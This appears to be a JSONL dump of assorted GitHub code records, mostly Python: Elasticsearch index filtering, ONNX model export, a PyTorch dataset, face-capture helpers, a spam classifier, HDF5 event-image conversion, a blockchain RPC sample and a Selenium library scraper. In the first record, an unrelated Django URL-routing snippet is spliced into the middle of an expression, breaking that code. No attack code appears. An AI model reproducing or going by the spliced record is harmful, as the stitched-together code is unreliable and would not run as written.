now:\n date_end: str = now.strftime(\"%Y%m%d%H%M%S\")\n\n start, end = parse(date_start), parse(date_end)\n date_day_list: List[Any] = list(rrule(DAILY, interval=1, dtstart=start, until=end))\n # date_day_list.append(end)\n\n date_month_list: List[Any] = list(rrule(DAILY, interval=14, dtstart=start, until=end))\n # date_month_list.append(end)\n\n filter_list: type_index_set_list = self._generate_filter_list(\n index, date_day_list, date_month_list, date_end, now\n )\n return list(set(filter_list))\n\n def _generate_filter_list(self, index, date_day_list, date_month_list, date_end, now):\n filter_list: type_index_set_list = []\n if len(date_day_list) == 1:\n if date_day_list[0].strftime(\"%d\") != now.strftime(\"%d\"):\n date_day_list.append(parse(date_end))\n for x in date_day_list:\n filter_list.append(\"{}_{}*\".format(index, x.strftime(\"%Y%m%d\")))\n elif len(date_day_list) > 1 and 
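# The URLconf above uses regex-based url(); on Django >= 2.0 the same routes are
# normally declared with path()/re_path(). A hedged sketch of the equivalent form:
from django.urls import path, re_path, include
from django.views.generic import TemplateView

urlpatterns = [
    path('', TemplateView.as_view(template_name='pages/home.html'), name='home'),
    path('accounts/', include('allauth.urls')),
    re_path(r'^robots\.txt', include('robots.urls')),
]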
len(date_month_list) == 1:\n if len(date_day_list) > 14:\n for x in date_month_list:\n filter_list.append(\"{}_{}*\".format(index, x.strftime(\"%Y%m\")))\n else:\n for x in date_day_list:\n filter_list.append(\"{}_{}*\".format(index, x.strftime(\"%Y%m%d\")))\n elif len(date_day_list) > 1 and len(date_month_list) > 1:\n if len(date_month_list) <= 6:\n for x in date_month_list:\n filter_list.append(\"{}_{}*\".format(index, x.strftime(\"%Y%m\")))\n else:\n for x in date_month_list[-6::1]:\n filter_list.append(\"{}_{}*\".format(index, x.strftime(\"%Y%m\")))\n return filter_list\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_esquery/esquery/builder/query_index_optimizer.py","file_name":"query_index_optimizer.py","file_ext":"py","file_size_in_byte":4447,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"34413975585","text":"# from backup.Small_UnetGated import UNetLWGated_lessc\nfrom Small_UnetGated import UNetLWGated\nimport torch\nfrom config import mdevice\n\nwidth = 1280\nheight = 720\n# width = 720\n# height = 480\n\nx=torch.randn(1,6,height,width).to(mdevice)\nfeature=torch.randn(1,6,height,width).to(mdevice)\nmask=torch.randn(1,6,height,width).to(mdevice)\nhisBuffer=torch.randn(3,4,height,width).to(mdevice)\nmodel = UNetLWGated(18, 3)\n# model.load_state_dict(torch.load(\"totalModel.290.pth.tar\")[\"state_dict\"])\nmodel = model.to(mdevice)\nmodel.eval()\ninput_names = [ \"input_x\",\"input_feature\",\"input_mask\",\"input_history\"]\noutput_names = [ \"output1\"]\nprint(model.conv1.conv_feature.weight[0,0])\n\ntorch.onnx.export(model, (x,feature,mask,hisBuffer),\n \"UNetGated.onnx\", verbose=True, input_names=input_names, output_names=output_names,opset_version=11)\n","repo_name":"fuxihao66/DX12WithTRT-legacy","sub_path":"OnnxGenerate/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29724654718","text":"import os\nimport torch\nfrom torch.utils.data import Dataset\nfrom transformers import PreTrainedTokenizer\n\nfrom utils.io import load_jsonl\nfrom utils.utils import logger\nfrom components.loaders.utils import convert_text_to_features\n\n\n# Prepare online dataset for training\nclass OnlineDataset(Dataset):\n def __init__(\n self, args, tokenizer: PreTrainedTokenizer, mode: str = \"train\"\n ) -> None:\n super().__init__()\n\n self.args = args\n\n file_path = os.path.join(\n self.args.data_dir, mode, \"data.jsonl\"\n )\n logger.info(\"LOOKING AT {}\".format(file_path))\n\n self.tokenizer = tokenizer\n self.data = load_jsonl(file_path)\n\n def __len__(self) -> int:\n return len(self.data)\n\n def __getitem__(self, index: int):\n # preprocessing data\n data_point = self.data[index]\n\n # 1. query\n query = data_point[\"query\"]\n\n # 2. 
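# A hedged companion to the torch.onnx.export call in deploy.py above: loading
# the generated UNetGated.onnx with onnxruntime (assumed installed) and running
# one inference. Input names and shapes mirror those used at export time
# (width=1280, height=720).
import numpy as np
import onnxruntime as ort

sess = ort.InferenceSession("UNetGated.onnx")
feed = {
    "input_x": np.random.randn(1, 6, 720, 1280).astype(np.float32),
    "input_feature": np.random.randn(1, 6, 720, 1280).astype(np.float32),
    "input_mask": np.random.randn(1, 6, 720, 1280).astype(np.float32),
    "input_history": np.random.randn(3, 4, 720, 1280).astype(np.float32),
}
print(sess.run(["output1"], feed)[0].shape)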
document\n document = data_point[\"document\"]\n\n input_ids_query, attention_mask_query = convert_text_to_features(\n text=query,\n tokenizer=self.tokenizer,\n max_seq_len=self.args.max_seq_len_query,\n )\n input_ids_document, attention_mask_document = convert_text_to_features(\n text=document,\n tokenizer=self.tokenizer,\n max_seq_len=self.args.max_seq_len_document,\n )\n\n return (\n torch.tensor(input_ids_query, dtype=torch.long),\n torch.tensor(attention_mask_query, dtype=torch.long),\n torch.tensor(input_ids_document, dtype=torch.long),\n torch.tensor(attention_mask_document, dtype=torch.long),\n )\n","repo_name":"phuongnam2002/Spalde","sub_path":"components/loaders/dataloaders.py","file_name":"dataloaders.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17431916924","text":"# -*- coding: utf-8 -*-\n'''\n图像采集程序-人脸检测\n由于外部程序需要调用它,所以不能使用相对路径\n\n'''\nimport argparse\nfrom A_Final_Sys.oldcare.audio import audioplayer\nfrom PIL import Image, ImageDraw, ImageFont\nimport cv2\nimport numpy as np\nimport os\nimport shutil\nimport time\n\n\ndef collect_faces(frame,error,action_list,action_map,\n start_time,limit_time,audio_dir,\n faceutil ):\n if error == 1:\n end_time = time.time()\n difference = end_time - start_time\n print(difference)\n if difference >= limit_time:\n error = 0\n\n face_location_list = faceutil.get_face_location(frame)\n for (left, top, right, bottom) in face_location_list:\n cv2.rectangle(frame, (left, top), (right, bottom),\n (0, 0, 255), 2)\n\n\n face_count = len(face_location_list)\n if error == 0 and face_count == 0: # 没有检测到人脸\n print('[WARNING] 没有检测到人脸')\n audioplayer.play_audio(os.path.join(audio_dir,\n 'no_face_detected.mp3'))\n error = 1\n start_time = time.time()\n elif error == 0 and face_count == 1: # 可以开始采集图像了\n print('[INFO] 可以开始采集图像了')\n audioplayer.play_audio(os.path.join(audio_dir,\n 'start_image_capturing.mp3'))\n # break\n elif error == 0 and face_count > 1: # 检测到多张人脸\n print('[WARNING] 检测到多张人脸')\n audioplayer.play_audio(os.path.join(audio_dir,\n 'multi_faces_detected.mp3'))\n error = 1\n start_time = time.time()\n else:\n pass\n#\n# # 新建目录\n# if os.path.exists(os.path.join(args['imagedir'], args['id'])):\n# shutil.rmtree(os.path.join(args['imagedir'], args['id']), True)\n# os.mkdir(os.path.join(args['imagedir'], args['id']))\n#\n# # 开始采集人脸\n# for action in action_list:\n# audioplayer.play_audio(os.path.join(audio_dir, action + '.mp3'))\n# action_name = action_map[action]\n#\n# counter = 1\n# for i in range(15):\n# print('%s-%d' % (action_name, i))\n# _, img_OpenCV = cam.read()\n# img_OpenCV = cv2.flip(img_OpenCV, 1)\n# origin_img = img_OpenCV.copy() # 保存时使用\n#\n# face_location_list = faceutil.get_face_location(img_OpenCV)\n# for (left, top, right, bottom) in face_location_list:\n# cv2.rectangle(img_OpenCV, (left, top),\n# (right, bottom), (0, 0, 255), 2)\n#\n# img_PIL = Image.fromarray(cv2.cvtColor(img_OpenCV,\n# cv2.COLOR_BGR2RGB))\n#\n# draw = ImageDraw.Draw(img_PIL)\n# draw.text((int(image.shape[1] / 2), 30), action_name,\n# font=ImageFont.truetype('C:\\\\Windows\\\\Fonts\\\\SIMLI.TTF', 40),\n# fill=(255, 0, 0)) # linux\n#\n# # 转换回OpenCV格式\n# img_OpenCV = cv2.cvtColor(np.asarray(img_PIL),\n# cv2.COLOR_RGB2BGR)\n#\n# cv2.imshow('Collecting Faces', img_OpenCV) # show the image\n#\n# image_name = os.path.join(args['imagedir'], args['id'],\n# action + '_' + str(counter) + '.jpg')\n# cv2.imwrite(image_name, origin_img)\n# # Press 'ESC' for exiting 
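# Hedged usage sketch for the OnlineDataset defined above: each item is a tuple
# of four tensors, so the default collate function works and a DataLoader can
# batch it directly. `args` and `tokenizer` are assumed to come from the
# surrounding training code (e.g. an argparse namespace and a HuggingFace
# AutoTokenizer).
from torch.utils.data import DataLoader

def make_loader(args, tokenizer, mode="train", batch_size=32):
    dataset = OnlineDataset(args, tokenizer, mode=mode)
    return DataLoader(dataset, batch_size=batch_size, shuffle=(mode == "train"))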
video\n# k = cv2.waitKey(100) & 0xff\n# if k == 27:\n# break\n# counter += 1\n#\n# # 结束\n# print('[INFO] 采集完毕')\n# audioplayer.play_audio(os.path.join(audio_dir, 'end_capturing.mp3'))\n#\n# # 释放全部资源\n# cam.release()\n# cv2.destroyAllWindows()\n","repo_name":"huijieXue1020/CVpart","sub_path":"oldcare/CV_part/collection.py","file_name":"collection.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2782136513","text":"# This is a sample Python script.\n\n# Press ⌃R to execute it or replace it with your code.\n# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\n\n\ndef resolve():\n n, w = map(int, input().split())\n print(int(n//w))\n\nimport sys\nfrom io import StringIO\nimport unittest\n\n\nclass TestClass(unittest.TestCase):\n def assertIO(self, input, output):\n stdout, stdin = sys.stdout, sys.stdin\n sys.stdout, sys.stdin = StringIO(), StringIO(input)\n resolve()\n sys.stdout.seek(0)\n out = sys.stdout.read()[:-1]\n sys.stdout, sys.stdin = stdout, stdin\n self.assertEqual(out, output)\n\n def test_入力例_1(self):\n input = \"\"\"10 3\"\"\"\n output = \"\"\"3\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_2(self):\n input = \"\"\"1000 1\"\"\"\n output = \"\"\"1000\"\"\"\n self.assertIO(input, output)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"SakagamiKazuto/atcoder_practice","sub_path":"abc-a/abc186-a.py","file_name":"abc186-a.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"662483721","text":"# corpus_names = ['anaphor_with', 'anaphor_without', 'total']\nfrom util import *\nkfolds = load_corpus_list('total')\nk_folds_X_train = kfolds[0]\nk_folds_X_val = kfolds[1]\nk_folds_X_test = kfolds[2]\n\nfor x in range(len(k_folds_X_test)):\n to_check = k_folds_X_test[x]\n all_others = []\n for fold_i, fold in enumerate(k_folds_X_test):\n if fold_i != x:\n all_others = all_others + fold\n\n to_check_ids = [(test['id'], test['file_name']) for test in to_check]\n others_ids = [(test['id'], test['file_name']) for test in all_others]\n\n overlap = 0\n for v in to_check_ids:\n if v in others_ids:\n overlap += 1\n print(overlap)\n","repo_name":"jinhuang-de/BA-Resolving-comparative-anaphora-with-and-without-lexical-heads","sub_path":"src/data_preparation/show_k_folds.py","file_name":"show_k_folds.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71731841769","text":"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import metrics\nimport sys\nif not sys.warnoptions:\n import warnings\n warnings.simplefilter(\"ignore\")\n\n\ndataset = pd.read_csv('spam_ham_dataset.csv')\nprint(dataset.isnull().sum())\n\n\nimport re \n\nimport nltk\nstopWords = nltk.download('stopwords')\n\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\n\nfrom nltk.stem.porter import PorterStemmer\nps = PorterStemmer()\n\n\ncorpus = []\nfor i in range(len(dataset)):\n text = re.sub('[^a-zA-Z]',' ', dataset['text'][i])\n text = text.lower()\n text = text.split()\n text = [ps.stem(word) for word in text if not word in set(stopwords.words('english'))]\n text = ' '.join(text)\n 
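# The fold-overlap check in show_k_folds.py above does list membership inside a
# loop (O(n*m)); the same count via set intersection, an equivalent rewrite that
# also deduplicates repeated (id, file_name) pairs:
def fold_overlap(to_check, all_others):
    check_ids = {(t['id'], t['file_name']) for t in to_check}
    other_ids = {(t['id'], t['file_name']) for t in all_others}
    return len(check_ids & other_ids)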
corpus.append(text)\n \n\nfrom sklearn.feature_extraction.text import CountVectorizer\ncv = CountVectorizer(max_features = 2000)\n\nX = cv.fit_transform(corpus).toarray() \ny = dataset.iloc[:,-1:].values\n\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test,y_train,y_test = train_test_split(X, y,test_size=0.2, random_state=0)\n\n\n\nfrom xgboost import XGBClassifier\nmodel = XGBClassifier(n_estimators = 150, booster = 'gbtree')\nmodel.fit(X_train, y_train)\ny_pred = model.predict(X_test)\nprint('XGBoost Accuracy: ', metrics.accuracy_score(y_test, y_pred), '\\n')\nprint(\"XGBClassifier Confusion Matrix\\n\", confusion_matrix(y_test, y_pred))\n\ncross_val = cross_val_score(estimator = model, X = X_train, y = y_train, cv = 10)\nprint('XGB Accuracy: ', cross_val.mean())\nprint('XGB Std: ', cross_val.std())\n\n\n\n\n\nfrom sklearn.model_selection import GridSearchCV\n\nparams = [\n {'n_estimators' : [50,100,150,200, 250], 'booster' : ['gbtree', 'gblinear']}\n ]\n\n\n\ngs = GridSearchCV(\n estimator = model,\n param_grid = params,\n scoring = 'accuracy',\n cv = 10,\n n_jobs = -1\n )\n\n\n\ngrid_search = gs.fit(X_train, y_train)\nbest_result = grid_search.best_score_\nbest_params = grid_search.best_params_\n\nprint('Best_Result', best_result)\nprint('Best_Params', best_params)\n\n\nimport pickle\nsave = pickle.dump(model, open('model.save', 'wb'))\n","repo_name":"emreyesilyurt/spam-detection-with-NLP","sub_path":"spam_mail_detection.py","file_name":"spam_mail_detection.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19690728689","text":"# coding:utf-8\n# convet event streams to image like representation\nfrom itertools import repeat\n\nimport h5py\nimport numpy as np\nfrom tqdm import tqdm\nimport concurrent.futures\nimport os\nimport sys\nimport glob\n\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\nfrom config import Config\nimport convert_event_to_channel_image_tool\n\n\ndef generate_wrap_function(generate_function, file_path, data_name):\n data = np.loadtxt(file_path)\n image = generate_function(data)\n return image, data_name\n\n\ndef generate_event_img(hdf5_path, generate_function, data_names, path_list):\n f = h5py.File(hdf5_path, \"w\")\n with concurrent.futures.ProcessPoolExecutor() as executor:\n for image, data_name in executor.map(generate_wrap_function, repeat(generate_function), path_list, data_names):\n f.create_dataset(name=data_name, data=image)\n # print(data_name)\n\n f.close()\n\n\nif __name__ == '__main__':\n\n # 保存的文件位置\n if not os.path.exists(Config.image_dir):\n os.makedirs(Config.image_dir)\n # 原始数据所在文件夹\n origin_dir = os.path.join(Config.data_dir, 'origin')\n\n path_list = []\n data_names = []\n for train_test in os.listdir(origin_dir):\n persons = os.listdir(os.path.join(origin_dir, train_test))\n for person in persons:\n txt_files = glob.glob(os.path.join(origin_dir, train_test, person, '*.txt'))\n # txt_files = os.listdir(os.path.join(origin_dir, scene, person))\n for txt_file in txt_files:\n # 读取的是原始数据\n file_path = os.path.join(origin_dir, train_test, person, txt_file)\n path_list.append(file_path)\n data_name = train_test + \"_\" + person + \"_\" + os.path.basename(txt_file)\n data_names.append(data_name)\n #break\n\n generate_event_img(Config.two_channels_counts_file, convert_event_to_channel_image_tool.generate_two_channels_count, data_names, path_list)\n 
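# A note on the pickle step in the spam-detection script above: to classify new
# mail later, the fitted CountVectorizer must be persisted alongside the XGBoost
# model, or the 2000-column feature space cannot be rebuilt. A hedged sketch
# reusing the `model` and `cv` objects from that script:
import pickle

pickle.dump(model, open('model.save', 'wb'))
pickle.dump(cv, open('vectorizer.save', 'wb'))

# later, in a fresh process:
clf = pickle.load(open('model.save', 'rb'))
vec = pickle.load(open('vectorizer.save', 'rb'))
print(clf.predict(vec.transform(['free prize, click now']).toarray()))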
generate_event_img(Config.two_channels_time_file, convert_event_to_channel_image_tool.generate_two_channels_time, data_names, path_list)\n generate_event_img(Config.four_channels_file, convert_event_to_channel_image_tool.generate_four_channels, data_names, path_list)\n generate_event_img(Config.two_channels_counts_and_time_file, convert_event_to_channel_image_tool.generate_two_channels_counts_and_time, data_names, path_list)\n\n # f = h5py.File(Config.two_channels_counts_file, \"w\")\n # with concurrent.futures.ProcessPoolExecutor() as executor:\n # for image, data_name in executor.map(generate_two_channels_count, path_list, data_names):\n # f.create_dataset(name=data_name, data=image)\n # # print(data_name)\n #\n # f.close()","repo_name":"zhangxiann/TPAMI_Gait_Identification","sub_path":"EV-Gait-IMG/make_hdf5.py","file_name":"make_hdf5.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"53"} +{"seq_id":"16459960683","text":"from web3 import Web3\nfrom web3py_ext import extend\n\nhost = \"https://api.baobab.klaytn.net:8651\"\n\ntransactionArgs = {\n \"from\": \"0x51239f87c33e95e3bdb72e31d06b5306bcec81cc\",\n \"to\": \"0x8c9f4468ae04fb3d79c80f6eacf0e4e1dd21deee\",\n \"value\": \"0x1\",\n \"gas\": \"0x9999\",\n \"maxFeePerGas\": \"0xbb43b7400\"\n}\n\nw3 = Web3(Web3.HTTPProvider(host))\neth_response = w3.eth.fill_transaction(transactionArgs)\n\nprint(eth_response)\n","repo_name":"klaytn/web3klaytn","sub_path":"web3rpc/rpc-specs/code-samples/python/eth/transaction/fillTransaction.py","file_name":"fillTransaction.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"16488229850","text":"import os\n\n\ndef scan_and_report(some_path):\n file_count = 0\n folder_count = 0\n for i in os.listdir(some_path):\n if os.path.isfile(some_path + i):\n file_count += 1\n elif os.path.isdir(some_path + i):\n folder_count += 1\n a, b = scan_and_report(some_path + i + \"\\\\\")\n file_count += a\n folder_count += b\n\n return file_count, folder_count\n\n\na, b = scan_and_report(\"D:\\\\\")\nprint(\"Files in the folder = \", a)\nprint(\"Folders in the folder = \", b)\n","repo_name":"vbelousPy/py_base","sub_path":"Lesson_05/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23904223598","text":"from selenium import webdriver #cong cu su dung\nfrom time import sleep\nfrom selenium.webdriver.common.keys import Keys #cong cu su dung\nfrom tqdm import tqdm\nimport json #cong cu su dung\n\n# khai bao bien\n\nbrowser = webdriver.Chrome(executable_path=\"chromedriver.exe\") #cong cu su dung\n# test open web\n\n#Domain chính của trang mà nhóm crawl dữ liệu\nbrowser.get(\n \"http://thuvienso.hcmute.edu.vn/cong-nghe-thong-tin/tat-ca-tai-lieu-cong-nghe-thong-tin-478-0.html\")\nbrowser.maximize_window()\nbrowser.execute_script(\"window.scrollBy(0,1000)\", \"\")\nsleep(5)\n\n#Phần chứa dữ liệu để crawl\nblockDocument = browser.find_element_by_xpath(\n '/html/body/div[1]/div[2]/div/div[2]/div[2]/div[1]/div[2]/div[2]/div[2]')\n#List dữ liệu để crawl\n# list_documents = browser.find_elements_by_xpath(\n# '/html/body/div[1]/div[2]/div/div[2]/div[2]/div[1]/div[2]/div[2]/div[2]/ul/li')\n# print(len(list_documents))\nlistOfDocuments = []\ncondition = True\ncount = 0\nwhile condition:\n\n # count += 1\n # if(count == 1183):\n 
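# An equivalent, non-recursive version of scan_and_report() above using os.walk,
# which also avoids the fragile manual "\\" path concatenation:
import os

def scan_and_report_walk(root):
    files = folders = 0
    for _, dirnames, filenames in os.walk(root):
        folders += len(dirnames)
        files += len(filenames)
    return files, folders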
# continue\n #List of documents to crawl on one page\n list_documents = browser.find_elements_by_xpath(\n '/html/body/div[1]/div[2]/div/div[2]/div[2]/div[1]/div[2]/div[2]/div[2]/ul/li')\n #get the last element.\n checkPage = browser.find_elements_by_xpath(\n '/html/body/div[1]/div[2]/div/div[2]/div[2]/div[1]/div[2]/div[2]/div[3]/ul/li')[-1]\n #get the nextPage element.\n lastPage = browser.find_elements_by_xpath(\n '/html/body/div[1]/div[2]/div/div[2]/div[2]/div[1]/div[2]/div[2]/div[3]/ul/li')[-2]\n # xxx = lastPage.find_element_by_tag_name('a').text\n for document in tqdm(list_documents):\n x = document.find_element_by_class_name('decs_book')\n y = document.find_element_by_class_name('txt_gray')\n # z = y.find_elements_by_class_name('txt_note')[1].text\n term = {\n \"documentTitle\": document.find_element_by_class_name('colorlink').text,\n \"documentDes\": x.find_element_by_tag_name(\"p\").text,\n \"documentSource\": y.find_elements_by_class_name('txt_note')[1].text,\n \"dateCreate\": y.find_elements_by_class_name('txt_note')[2].text,\n \"review\": y.find_elements_by_class_name('txt_note')[3].text,\n \"downloaded\": y.find_elements_by_class_name('txt_note')[4].text\n }\n listOfDocuments.append(term)\n try:\n if(count >= 3000):\n condition = False\n # if(lastPage == checkPage):\n # condition = False\n checkPage.find_element_by_class_name('bor_none').click()\n except:\n condition = False\nprint(len(listOfDocuments))\nwith open('data.json', 'w', encoding='utf-8') as f:\n json.dump(listOfDocuments, f, ensure_ascii=False, indent=4)\n\nsleep(5)\n","repo_name":"sttinh99/crawling","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
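# A hedged hardening sketch for the crawl loop above: checkpoint the scraped
# items every few pages so a crash does not lose everything, and catch only the
# Selenium exception that actually signals a missing "next page" control instead
# of using a bare except.
import json
from selenium.common.exceptions import NoSuchElementException

def checkpoint(items, path='data.partial.json'):
    with open(path, 'w', encoding='utf-8') as f:
        json.dump(items, f, ensure_ascii=False, indent=4)

# inside the while loop, in place of the bare `except:`:
# try:
#     checkPage.find_element_by_class_name('bor_none').click()
# except NoSuchElementException:
#     condition = False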